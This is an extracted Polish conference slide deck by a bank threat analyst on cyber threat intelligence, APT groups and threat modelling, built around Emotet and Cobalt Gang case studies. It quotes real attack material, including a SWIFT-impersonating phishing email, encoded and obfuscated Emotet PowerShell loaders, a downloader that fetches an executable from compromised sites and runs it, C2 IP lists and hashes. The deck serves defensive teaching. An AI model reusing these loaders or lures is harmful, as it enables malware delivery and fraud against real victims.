Upload
others
View
0
Download
0
Embed Size (px)
Citation preview
Czego możemy nauczyć się od grup APT,
czyli jak wykorzystać Cyber Threat Intelligence
do budowy cyberbezpieczeństwa
Ireneusz Tarnowski
Ireneusz Tarnowski, Warszawa, 22.10.2019
whoami IRENEUSZ TARNOWSKI
work :: ekspert w Zespole Analiz i Reagowania na Cyberzagrożenia Santander Bank Polska,
konsultant cyberbezpieczeństwa,
CyberSec :: analityk zagrożeń, pasjonat bezpieczeństwa komputerowego i procedur ochrony informacji
Infrastructure Architect :: projektant zorientowanych na bezpieczeństwo oraz wysokodostępnych architektur IT
sysadmin :: administrator systemów serwerowych, baz danych, usług sieciowych (pasjonat Sun/Oracle Solaris)
Member :: ISACA, Technology Risk & Information Security, IKB,
edu :: wykształcenie: Informatyka, Cyber Security Management
Prezentacja, w przeciwieństwie do wiedzy prelegenta
- nie wynika wprost z pracy w Santander Bank Polska
- nie zawiera informacji niejawnych, poufnych, TLP:RED, TLP:AMBER
- oparta jest tylko na informacjach dostępnych w otwartych źródłach (OSINT)
Ireneusz Tarnowski, Warszawa, 22.10.2019
Czego możemy nauczyć się od grup APT …
Ireneusz Tarnowski
Cobalt Gang
Lazarus
FIN7
Fancy Bear
EMOTET
DanaBot
BackSwap
WannaCry
Petya
Trickbot
Mirai Satori
Okiru
Leafminer
Cozy Bear
TA505
URSNIF/GOZI
CYBERPRZESTRZEŃ
10 lat 6 TB international cyber criminals ……… IRIDIUM STUXNET -> detekcja 2010 rok
Norsk Hydro 19 Marca 2019
$35 million-$41 million
24 Maja 2018
Ireneusz Tarnowski
24 Maja 2018
Ireneusz Tarnowski
Ireneusz Tarnowski
From: Swift EU Subject: to complete the account creation
Ireneusz Tarnowski, Warszawa, 22.10.2019
Czego możemy nauczyć się od grup APT …
From: Swift EU Subject: to complete the account creation
Thank you for requesting an account on swift.com which you submitted on 21/08/2019. To complete the account creation, you must confirm your account creation by clicking on the following link: hxxps://swift-customer[.]com/FAccount_Details.img hxxps://swift-customer[.]com/Login_Details.img Once you have done so, you can follow the prompts to login, set up additional security, and register for an institution if you are requesting an account on behalf of a Customer owning a BIC. Once your account is confirmed, you may receive updates and offers related to the SWIFT products or services that you’ve purchased or use. If you do not have access to the Internet on your PC, copy the above URL to a PC where you can access the Internet. Please visit hxxps://swift-customer[.]com/ for more information about SWIFT Support services. This e-mail and any attachments thereto may contain information which is confidential and/or proprietary and are intended for the sole use of the recipient(s) named above. It is not intended to create or affect any contractual arrangements between the parties. If you have received this e-mail in error, please immediately notify your administrator and delete the e-mail. Thank you for your co-operation.
Ireneusz Tarnowski, Warszawa, 22.10.2019
Czego możemy nauczyć się od grup APT …
Domain: SWIFT-CUSTOMER.COM Registered: 2019-08-14 87.236.19.238 ASN: 198610 2019-08-15 104.31.79.213 ASN: 13335 (RU) 2019-08-15 104.31.78.213 ASN: 13335 (RU)
Domain Name: SWIFT-CUSTOMER.COM Registry Domain ID: 2422822025_DOMAIN_COM-VRSN Registrar WHOIS Server: whois.beget.com Registrar URL: http://beget.com Updated Date: 2019-08-15T08:43:58Z Creation Date: 2019-08-13T09:09:09Z Registry Expiry Date: 2020-08-13T09:09:09Z Registrar: Beget LLC Registrar Abuse Contact Email: [email protected] Name Server: NITIN.NS.CLOUDFLARE.COM Name Server: ZITA.NS.CLOUDFLARE.COM DNSSEC: unsigned
Ireneusz Tarnowski, Warszawa, 22.10.2019
Czego możemy nauczyć się od grup APT …
Ireneusz Tarnowski, Warszawa, 22.10.2019
Czego możemy nauczyć się od grup APT …
File Name: Firefox_Update.exe File Name: Opera_Update.exe File Name: Chrome_Update.exe
Ireneusz Tarnowski, Warszawa, 22.10.2019
Czego możemy nauczyć się od grup APT …
MALWARE:
FAccount_Details.img a9503a000338787020af99fda4a982ec Account_Details.js 0f6b61e17b0c763ac46fd3de88ae7665 Dropped file tmp.exe PATH: C:\Users\Administrator\AppData\Local\Temp\tmp.exe Parentname: C:\Windows\SysWOW64\wscript.exe MD5sum 7eb8dd2f56c292f1b3071c8570eca791 DNS requests safestaticfirefox.com (certificate Let’s Encrypt 19.08.2019 17:50:10 GMT) HTTPS request https://safestaticfirefox[.]com/uacuxuiaeoerkaryixju Connections ip 139.28.39.70 (199.16.199.5)
Ireneusz Tarnowski, Warszawa, 22.10.2019
Czego możemy nauczyć się od grup APT …
Ireneusz Tarnowski, Warszawa, 22.10.2019
Czego możemy nauczyć się od grup APT …
Ireneusz Tarnowski, Warszawa, 22.10.2019
Czego możemy nauczyć się od grup APT …
vavtqlaavhdeau uacuxuiaeoerkaryixju hxxps://timeswindows[.]com Deszyfruje DLL ycD.dll i wykonuje w pamięci CobInt Malware Family
Atrybucja oparta o TTP (narzędzia, malware, sample) … bardzo wysoka pewność.
Ireneusz Tarnowski, Warszawa, 22.10.2019
Czego możemy nauczyć się od grup APT …
Ireneusz Tarnowski
Ireneusz Tarnowski
Ireneusz Tarnowski, Warszawa, 22.10.2019
Czego możemy nauczyć się od grup APT …
Identyfikacja
Prewencja/Ochrona
Detekcja
Reakcja
Odzyskiwanie
Ireneusz Tarnowski
Ireneusz Tarnowski, Warszawa, 22.10.2019
Czego możemy nauczyć się od grup APT …
co robimy źle?
Ireneusz Tarnowski
Ireneusz Tarnowski, Warszawa, 22.10.2019
Czego możemy nauczyć się od grup APT …
co robimy źle?
Ireneusz Tarnowski
Ireneusz Tarnowski, Warszawa, 22.10.2019
Czego możemy nauczyć się od grup APT …
Identyfikacja
Prewencja/Ochrona
Detekcja
Reakcja
Odzyskiwanie
Ireneusz Tarnowski Antycypacja
Ireneusz Tarnowski, Warszawa, 22.10.2019
Czego możemy nauczyć się od grup APT …
Cyber Threat Intelligence
Ireneusz Tarnowski
Ireneusz Tarnowski, Warszawa, 22.10.2019
Czego możemy nauczyć się od grup APT …
Poznaj swojego wroga
Ireneusz Tarnowski
Poznanie innych i poznanie siebie to zwycięstwo bez ryzyka. Poznanie otoczenia i poznanie sytuacji to zwycięstwo całkowite.
Sun Tzu Kogo się boisz, przed czym/kim budujesz obronę Poznaj swojego adwersarza Jakie techniki/taktyki stosuje Twój wróg Co wiecie o swoim wrogu Czy macie potencjał go zauważyć Czy macie potencjał się obronić Czy go szanujecie
Ireneusz Tarnowski, Warszawa, 22.10.2019
Czego możemy nauczyć się od grup APT …
Hackerzy - kim są?
Ireneusz Tarnowski, Warszawa, 22.10.2019
Czego możemy nauczyć się od grup APT …
Hackerzy - kim są?
Ireneusz Tarnowski, Warszawa, 22.10.2019
Czego możemy nauczyć się od grup APT …
Hackerzy - kim są?
Ireneusz Tarnowski, Warszawa, 22.10.2019
Czego możemy nauczyć się od grup APT …
Hackerzy - kim są?
Ireneusz Tarnowski, Warszawa, 22.10.2019
Czego możemy nauczyć się od grup APT …
Ireneusz Tarnowski
CYBERZAGROŻENIA - ŹRÓDŁA
grupy afiliowane przy rządach (agencje rządowe, cyberarmie, najemnicy). Takie grupy zajmują się
szpiegostwem – próbują poznać tajemnice narodowe innego kraju, czasem mają zadania
destrukcyjne wobec swoich wrogów;
terroryści wykorzystujący cyberprzestrzeń do swoich działań;
szpiedzy przemysłowi (celem jest kradzież własności intelektualnej, patentów i technologii);
zorganizowane grupy przestępcze – motywowani finansowo cyberprzestępcy, którzy swoją
działalność przenieśli w cyberprzestrzeń;
niezadowoleni pracownicy (Insider);
hakerzy – indywidualiści często z dużym potencjałem operacyjnym wykradają dane, które potem
sprzedają, zatrzymując działalność firm;
hacktywiści – kierowani ideologią hakerzy (często mniej zaawansowani), którzy najczęściej
prowadzą działania destrukcyjne i propagandowe;
konkurenci biznesowi
Ireneusz Tarnowski, Warszawa, 22.10.2019
Czego możemy nauczyć się od grup APT …
Ireneusz Tarnowski
CYBERZAGROŻENIA
Ireneusz Tarnowski, Warszawa, 22.10.2019
Czego możemy nauczyć się od grup APT …
Ireneusz Tarnowski
Modelowanie zagrożeń
Modelowanie zagrożeń to szereg działań mających na celu identyfikację i
zrozumienie zagrożeń dotyczących danego zasobu (systemu informatycznego,
aplikacji czy danych).
Modelowanie zagrożeń wspiera identyfikację i priorytetyzację środków
zaradczych oraz realizację wymogów dotyczących bezpieczeństwa, które należy
spełnić w danym środowisku (systemie informatycznym).
Ireneusz Tarnowski, Warszawa, 22.10.2019
Czego możemy nauczyć się od grup APT …
Ireneusz Tarnowski
Modelowanie zagrożeń
Modelowanie zagrożeń zwykle obejmuje takie aspekty jak:
identyfikacja aktywów,
opis zagrożenia, w tym opis podmiotów atakujących oraz ich techniki, taktyki i
procedury (TTP),
możliwości przeprowadzenia ataku (w ujęciu ilościowym oraz jakościowym),
związek pomiędzy zagrożeniem a aktywami organizacji,
opis założeń dotyczących bezpieczeństwa,
identyfikacja powierzchni ataku,
modelowanie zagrożeń na podstawie zebranych informacji,
ich analiza w kontekście przepływu danych lub elementów w celu umożliwienia
obserwacji wektorów ataku.
Ireneusz Tarnowski, Warszawa, 22.10.2019
Czego możemy nauczyć się od grup APT …
Co robić z wiedzą o zagrożeniach ?
Ireneusz Tarnowski
Ireneusz Tarnowski, Warszawa, 22.10.2019
Czego możemy nauczyć się od grup APT …
Co robić z wiedzą o zagrożeniach ?
Ireneusz Tarnowski
Zarządzać zagrożeniami!!!
Ireneusz Tarnowski, Warszawa, 22.10.2019
Czego możemy nauczyć się od grup APT …
Ireneusz Tarnowski
Threat Management
Ireneusz Tarnowski, Warszawa, 22.10.2019
Czego możemy nauczyć się od grup APT …
Threat Management
Ireneusz Tarnowski
Intelligence (Feed, Analysis) Mitigation Vulnerability Incident Response (Hunting) Risk Analysis Operations (SOC) Leaders
Ireneusz Tarnowski, Warszawa, 22.10.2019
Czego możemy nauczyć się od grup APT …
Źródła informacji
Ireneusz Tarnowski
Ireneusz Tarnowski, Warszawa, 22.10.2019
Czego możemy nauczyć się od grup APT …
Ireneusz Tarnowski
Firmy/organizacje specjalistyczne (FS-ISAC, CERT xx, MISPy)
Baza podatności CVE + bazy exploitów
Raporty i ostrzeżenia firm analitycznych
FireEye, TrendMicro, Symantec DeepSight, PA UNIT42, BAE, Group-IB, Proofpoint, FLashPoint, Intel471, Kaspersky, …
Analiza TTP + malware
Passive DNS, DNS reputacyjny (RisIQ, DomainTools)
informacje z serwerów C2
Darknet (+inwigilacja grup przestępczych, forów, kanałów komunikacyjnych)
Własne analizy + sandboxy + trapy + incydenty
Media, blogi, TT
Intelligence – zaufane źródło
Pasywne Aktywne
Ireneusz Tarnowski, Warszawa, 22.10.2019
Czego możemy nauczyć się od grup APT …
Ireneusz Tarnowski
Intelligence – IoC
Zalety: Łatwość pozyskania Łatwość implementacji
Wady : Skuteczność Pewność (przejęte domeny, stacje przesiadkowe, proxy, TOR …. ) Format (MD5/SHA1/SHA256)
Ireneusz Tarnowski, Warszawa, 22.10.2019
Czego możemy nauczyć się od grup APT …
Ireneusz Tarnowski
Intelligence – TTP
Ireneusz Tarnowski, Warszawa, 22.10.2019
Czego możemy nauczyć się od grup APT …
Ireneusz Tarnowski
Cele (Taget)
Atakujący (Attackers)
Metody (Methods)
Operacje (Operations)
Dostawcy – firmy trzecie
Podatności
Intelligence – czego oszukać
Ireneusz Tarnowski, Warszawa, 22.10.2019
Czego możemy nauczyć się od grup APT …
Ireneusz Tarnowski
Intelligence – narzędzia TIP
Ireneusz Tarnowski, Warszawa, 22.10.2019
Czego możemy nauczyć się od grup APT …
Ireneusz Tarnowski
Intelligence – narzędzia TIP
198.251.88[.]27 malware activity
Cobalt Emotet Smokeloader Quantloader Gootkit Panda Zeus
Ireneusz Tarnowski, Warszawa, 22.10.2019
Czego możemy nauczyć się od grup APT …
Ireneusz Tarnowski
Wzbogacanie wiedzy o atakach o kontekst
Łączenie i korelowanie informacji z wewnątrz i zewnątrz (identyfikacja i
ocena ataku)
Ocena rzeczywistego zagrożenia dla organizacji – synteza ataku
Identyfikacja False-Positive
Threat Intelligence 4 Incident Response
Ireneusz Tarnowski, Warszawa, 22.10.2019
Czego możemy nauczyć się od grup APT …
Ireneusz Tarnowski
IoA
synteza, analiza, protekcja
atrybucja
Budowanie wiedzy o ataku
genotyp malware, rodzina,
technika eksploitacji
technika persystencji
technika komunikacji C2
technika ukrywania się (antysandboxing) Wzbogacanie wiedzy o ataku
Threat Intelligence 4 Incident Response
Ireneusz Tarnowski, Warszawa, 22.10.2019
Czego możemy nauczyć się od grup APT …
Ireneusz Tarnowski, Warszawa, 22.10.2019
Czego możemy nauczyć się od grup APT …
MITRE ATT&CKTM
Ireneusz Tarnowski, Warszawa, 22.10.2019
Czego możemy nauczyć się od grup APT …
MITRE ATT&CKTM
Ireneusz Tarnowski, Warszawa, 22.10.2019
Czego możemy nauczyć się od grup APT …
MITRE ATT&CKTM
Threat Intelligence
Zadaniem strategii było przygotować i doprowadzić siły zbrojne (armię) do najważniejszego punktu teatru
wojny, jakim była bitwa, zaś zadaniem taktyki było w tej bitwie odnieść zwycięstwo.
Strategia Taktyka Operacja Technika
Ireneusz Tarnowski, Warszawa, 22.10.2019
Czego możemy nauczyć się od grup APT …
TI Taktyczny: metody ataku, narzędzia i taktyka, oparta na wystarczających zasobach
wiedza o potencjalnych atakujących (infiltracja środowiska atakującego)
TI Techniczny: wskaźniki/Identyfikatory zagrożeń (malware)
TI Operacyjny: szczegóły nadchodzących ataków, szacowanie organizacyjnych możliwości
w określaniu przyszłych zagrożeń cybernetycznych
TI Strategiczny: Informacje na wysokim poziomie o zmianie ryzyk, dokładne określenie
oceny krytycznych zagrożeń
Threat Intelligence
Ireneusz Tarnowski, Warszawa, 22.10.2019
Czego możemy nauczyć się od grup APT …
Ireneusz Tarnowski
Delaware, USA – August 27, 2019 – Emotet botnet like a relic monster of cyberspace has woken up and is preparing to strike a new blow. Earlier this year, the known command-and-control infrastructure of the botnet disappeared from researchers’ radars, presumably for maintenance and modification. As expected, this did not last too long
EMOTET
Active & online C2's (updated 08_29_19) 8/22/19 -------------------- 104.131.11.150:8080 104.131.208.175:8080 104.236.151.95:7080 142.93.88.16:443 144.139.247.220:80 159.89.179.87:7080 162.144.119.216:8080 162.243.125.212:8080 170.150.11.245:8080 176.31.200.130:8080 177.242.214.30:80 187.163.180.243:22 195.242.117.231:8080 216.98.148.156:8080 217.13.106.160:7080 31.12.67.62:7080 45.123.3.54:443 45.32.158.232:7080 46.101.142.115:8080 46.105.131.69:443 64.13.225.150:8080 69.45.19.145:8080 70.32.84.74:8080 75.127.14.170:8080 91.83.93.103:7080
EMOTET
EMOTET
Ireneusz Tarnowski, Warszawa, 22.10.2019
Czego możemy nauczyć się od grup APT …
EMOTET
Ireneusz Tarnowski, Warszawa, 22.10.2019
Czego możemy nauczyć się od grup APT …
EMOTET
Ireneusz Tarnowski, Warszawa, 22.10.2019
Czego możemy nauczyć się od grup APT …
EMOTET
Ireneusz Tarnowski, Warszawa, 22.10.2019
Czego możemy nauczyć się od grup APT …
EMOTET
Ireneusz Tarnowski, Warszawa, 22.10.2019
Czego możemy nauczyć się od grup APT …
powershell -e IAAoACAATgBlAFcALQBvAGIAagBlAGMAdAAgACAAcwBZAHMAVABlAE0ALgBJAE8ALgBjAE8AbQBQAHIAZQBTAHMASQBvAG4ALgBkAGUAZgBsAGEAVABFAHMAVAByAEUAYQBtACgAIABbAGkATwAuAE0ARQBtAE8AcgBZAFMAdAByAEUAYQBtAF0AWwBzAHkAUwBUAEUATQAuAEMATwBuAFYAZQBSAHQAXQA6ADoARgByAG8AbQBCAEEAcwBFADYANABzAFQAcgBJAE4AZwAoACgAJwBaAFoARgBoACcAKwAnAGkAOQBwACcAKwAnAEEARQBJACcAKwAnAGIALwAnACsAJwBTACcAKwAnAGoANAAnACsAJwBFACcAKwAnAFYAcgBIAHUARwBzADkAJwArACcAUwAnACsAJwB1AFIAQwA0AFMAJwArACcAWQAnACsAJwBMAEIANgA5ACcAKwAnAEYAaQBqACcAKwAnADEAQQByAEIAVgBrADMAJwArACcAWQAnACsAJwA1AEwAJwArACcATABaAGoAJwArACcAYwBrACcAKwAnAEcANgBNAG4ALwB2ACcAKAcQA3AFMAJwArACcAVQAnACsAJwAwAGwAJwArACcATgAzAGEASgBCACcAKwAnAGsAUwAnACsAJwBrAHQAZBHAGYALwBEAEEAbwAnACsAJwByAGoARQBkAHcAZABrAEcAeABQADAAJwArACcARAAnACkAKQAgACwAIABbAGkAbwAuAEMATwBtAFAAcgBFAFMAUwBJAE8ATgAuAGMATwBNAHAAcgBFAHMAUwBpAG8ATgBNAE8ARABlAF0AOgA6AEQAZQBDAG8ATQBQAHIAZQBTAFMAKQAgAHwAJQB7ACAATgBlAFcALQBvAGIAagBlAGMAdAAgAEkAbwAuAHMAdAByAGUAQQBNAHIARQBhAGQAZQBSACgAJABfACAALABbAFMAeQBTAFQAZQBtAC4AdABFAHgAVAAuAGUAbgBjAE8AZABJAE4AZwBdADoAOgBBAFMAYwBpAGkAKQAgAH0AKQAuAFIAZQBBAGQAVABPAGUATgBEACgAIAApACAAfABpAGUAWAA=
EMOTET
Ireneusz Tarnowski, Warszawa, 22.10.2019
Czego możemy nauczyć się od grup APT …
powershell –e &((gV('*mD'+'R*'))naME[3,11,2]-JoIN'')(NeW-ObjeCTIocoMPREsSiOnDeflATEStreAM([IomemOrYstreAm][CONvert]::frOmBAsE64STrING(('V'+'ZF'+'Ri5tAFI'+'X/yjwIk5B'+'GK1hoV4'+'S9Kp'+'WU0l0pYdNQCONkoq'+'7jXKsT3'+'SXk'+'v'+'/d2m6'+'T0Ps0MH'+'+'+'eec8bZbLI4gcCP'+'+BME0y7lofM'+'AsAaIjJqWWDwradk3Zd'+'0'+'nVS'+'S6VsaGDg'+'IkADK'+'PeGVtd'+'+d5ne'+'1wcCW27m'+'i8qV'+'s'+'O'+'RnRDhXbwfpkv3v'+'2F'+'Gqp6FO'+'2h'+'1u0b+wcU+'+'7Y23uHrj'+'elFuUetXUMbj+'+'I'+'f0jzk'+'N'+'w'+'YLMQiN5ipSG6mPezV4n8q/zE'+'B'+'QobF0R8'+'Ty9Y'+'p'+'JNJbse9vCjB53v3e6tjN+z'+'+ehM1LgLUT86G8'+'2E'+'MOa'+'Sm'+'jSCWhYxPj'+'H'+'D3R'+'/fpH'+'rHIKI'+'Z5hT/BzobQIfs'+'jh'+'yl'+'BnvjoP'+'qux4p'+'nVrwn3xxF'+'VhwV7'+'0oHh6wV0JWMwf8'+'N'+'MtTVht26'+'3'+'F+sv'+'3r'+'6dK7m+JkN'+'Ir9Z5K64u'+'/YZ'+'R'+'m'+'ZbYK'+'EzhHf'+'x'+'jt'+'sf'+'Mn'+'D1'+'Y'+'HNZ'+'pmyy5VV'+'7Q10tTKl'+'r'+'diyVCx4TzNnp5UZsVH/c'+'RQ+SRr'+'6bg65H'+'5NhH'+'hbk'+'tAnPZ'+'y'+'m'+'srE7ns/Mjhzx'+'e'+'Z8'+'Q8T'+'rCDN+g3')),[SysTEmiOcoMpRESSioNcoMpReSSionMode]::DEcOmpress)|FOreACh-obJEct{NeW-ObjeCTSYSteMIOStReaMrEADeR($_,[teXTENcoDiNG]::aSCII)})ReaDToend()
78.142.208[.]193 www.raddalmutallaga[.]com 111.67.31[.]9 lostandfoundpetsworld[.]com
EMOTET
Ireneusz Tarnowski, Warszawa, 22.10.2019
Czego możemy nauczyć się od grup APT …
1
2
3
4
5
6
7
8
9
1
0
1
1
1
2
1
3
$L28452='P683717';$i2109578='811';$S86178='W86878_6';$o42694=$env:
userprofile+'\'+$i2109578+'exe';$f6010414='d_4_554';
$i4851966=('ne'+'w'+'-objec'+'t')NEtW`eBCLie`NT;$R58806=
'http://daithanhtechcom/wp-includes/tlmvyggiwm_qiuyrwc-8/@
http://alvaactivewearcom/wp-admin/zic3_6ikeysj493-496935535/@
https://utahdonorsforumcom/wp-content/7n02l558tr_4l6lqd-8757/@
http://luxuriousroxycom/bqiep/trLCslfrn/@
http://mmadamechicmeushopcom/wp-admin/x79891cd_q7o212dm-21396/'
sPlIt('@');
$L7_388_1='A4180364';
foreach($B24597in$R58806){
try{$i4851966dOWNloadfilE($B24597,$o42694);$L1458255='I41931';
If((('Get-It'+'em')$o42694)LEngTH-ge32887){&('I'+'nvoke-
It'+'em')$o42694;$U_4444='Q590211';break;$Q76637='p833607'}}
catch{}}$u908_2='H_9514_'
EMOTET
Ireneusz Tarnowski, Warszawa, 22.10.2019
Czego możemy nauczyć się od grup APT …
Źródło: https://unit42.paloaltonetworks.com/unit42-malware-team-malspam-pushing-emotet-trickbot/
EMOTET
Ireneusz Tarnowski, Warszawa, 22.10.2019
Czego możemy nauczyć się od grup APT …
EMOTET
Ireneusz Tarnowski, Warszawa, 22.10.2019
Czego możemy nauczyć się od grup APT …
hxxp://likesmore.tk/wp-includes/6sb-r4a0q7d4-3641564300/
hxxp://wildcard.wpmudev.host/wp-admin/jo70imu-7ruxvc0ey-47307
hxxp://ks.od.ua/wp-includes/KXdkADm/
hxxp://testalmanur.kz/wp-admin/zJCcZUA/
hxxps://ashwameghmilitaryschool.in/wp-admin/s2x180u-ubl8crx-78/
hxxp://testalmanur.kz/wp-admin/zJCcZUA/
hxxps://czechmagic.tk/wp-admin/x5kl-ojhm-36890/
hxxps://tpzen.vn/wp-admin/tpa-von6e-51590219/
hxxp://www.metastar.co.uk/wp-includes/z2rvgxnrs-73u-88344/
hxxps://czechmagic.tk/wp-admin/x5kl-ojhm-36890
hxxp://www.metastar.co.uk/wp-includes/z2rvgxnrs-73u-88344
hxxp://testalmanur.kz/wp-admin/zJCcZUA/
hxxps://ashwameghmilitaryschool.in/wp-admin/s2x180u-ubl8crx-78/
hxxps://tpzen.vn/wp-admin/tpa-von6e-51590219/
hxxps://czechmagic.tk/wp-admin/x5kl-ojhm-36890/
hxxps://ashwameghmilitaryschool.in/wp-admin/s2x180u-ubl8crx-78/
hxxps://tpzen.vn/wp-admin/tpa-von6e-51590219/
hxxp://www.metastar.co.uk/wp-includes/z2rvgxnrs-73u-88344/
hxxp://testalmanur.kz/wp-admin/zJCcZUA/
hxxp://thechainsawshack.com/wp-content/nd2iy-9lb-58945900/
Emotet Epoch 3 IOCs as of 2019-10-18 18:00 US/Eastern
źródło: https://pastebin.com/aX6ezy4E
https://gbhackers.com/trickbot-emotet-ryuk-ransomware/
EMOTET
Ireneusz Tarnowski, Warszawa, 22.10.2019
Czego możemy nauczyć się od grup APT …
Ireneusz Tarnowski, Warszawa, 22.10.2019
Czego możemy nauczyć się od grup APT …
EMOTET
Ireneusz Tarnowski, Warszawa, 22.10.2019
Czego możemy nauczyć się od grup APT …
Main object- "v1je27pxxzatki9uw58tib_m2r21-869536710" sha256 4ea830bc524f4854a2dfb9c6065312a1e77da0cfb944d5841916a3be1553a1b0 sha1 05f415195f042c463bb0cec36a1892521247f32c md5 809ed8ce0a2f64c99049ce54a3b4e9b7 Dropped executable file sha256 C:\Users\admin\266.exe c16b037770de8e203fd61532daf379889933d310d45d9502675c6faa3ac6ad70 DNS requests domain upeya.org domain craftlok.com domain www.ethiofidel.com Connections ip 201.184.105.242 ip 185.224.138.150 ip 166.62.28.132 ip 24.45.195.162 ip 66.96.147.145 HTTP/HTTPS requests url http://upeya.org/wp-includes/uIcbrMKbd/ url http://24.45.195.162:7080/walk/forced/add/merge/ url http://www.ethiofidel.com/cgi-bin/htt6ft2j_eh9u68dup-79/ url http://201.184.105.242:443/symbols/
IoC
EMOTET
Ireneusz Tarnowski, Warszawa, 22.10.2019
Czego możemy nauczyć się od grup APT …
Ireneusz Tarnowski, Warszawa, 22.10.2019
Czego możemy nauczyć się od grup APT …
EMOTET
Ireneusz Tarnowski, Warszawa, 22.10.2019
Czego możemy nauczyć się od grup APT …
Ireneusz Tarnowski, Warszawa, 22.10.2019
Czego możemy nauczyć się od grup APT …
Ireneusz Tarnowski, Warszawa, 22.10.2019
Czego możemy nauczyć się od grup APT …
https://paste.cryptolaemus.com/emotet/2019/06/10/emotet-malware-IoCs_06-10-19.html
EMOTET
Ireneusz Tarnowski, Warszawa, 22.10.2019
Czego możemy nauczyć się od grup APT …
TRICKBOT EMOTET
Ireneusz Tarnowski, Warszawa, 22.10.2019
Źródło: https://www.sneakymonkey.net/2019/05/22/trickbot-analysis/
Czego możemy nauczyć się od grup APT …
Threat Actor ???
EMOTET
Ireneusz Tarnowski, Warszawa, 22.10.2019
Czego możemy nauczyć się od grup APT …
Atrybucja
Polimorficzny malware Infrastruktura C2 Infrastruktura landing-page (tysiące) Poszlaki Ryuk – Hermes Sprzedany dostęp do Infrastruktury (operator EMEA)
State - sposnored
While the link with Hermes seems to point to Grim Spider being affiliated with the former’s North Korean developers, the fact that Hermes was up for sale on Russian underground forums pokes holes in that theory.
EMOTET
Ireneusz Tarnowski, Warszawa, 22.10.2019
Czego możemy nauczyć się od grup APT …
ATRYBUCJA EMOTET
Ireneusz Tarnowski, Warszawa, 22.10.2019
Czego możemy nauczyć się od grup APT …
EMOTET
Ireneusz Tarnowski, Warszawa, 22.10.2019
Czego możemy nauczyć się od grup APT …
Źródło: https://www.govcert.admin.ch/downloads/whitepapers/govcertch_trickbot_analysis.pdf
EMOTET
Ireneusz Tarnowski, Warszawa, 22.10.2019
Czego możemy nauczyć się od grup APT …
EMOTET
Ireneusz Tarnowski, Warszawa, 22.10.2019
Czego możemy nauczyć się od grup APT …
EMOTET
Ireneusz Tarnowski, Warszawa, 22.10.2019
Czego możemy nauczyć się od grup APT …
EMOTET
Ireneusz Tarnowski, Warszawa, 22.10.2019
Czego możemy nauczyć się od grup APT …
Ireneusz Tarnowski
Wnioski … perspektywy
analiza zagrożeń TIA + Threat Hunting
zrozumienie TTP
badanie możliwości przeprowadzenia ataku
analiza podatności i wektorów ataku, jakie się pojawiają
działalność wywiadowcza wśród grup hackerskich
Jak się bronić? Jak wykrywać działanie malware w organizacji?
Jak rozpoznawać nowe zagrożenia? Jak budować wiedzę?
Krajobraz Zagrożeń
Ireneusz Tarnowski, Warszawa, 22.10.2019
Czego możemy nauczyć się od grup APT …
Ireneusz Tarnowski
Ireneusz Tarnowski, Warszawa, 22.10.2019
Czego możemy nauczyć się od grup APT …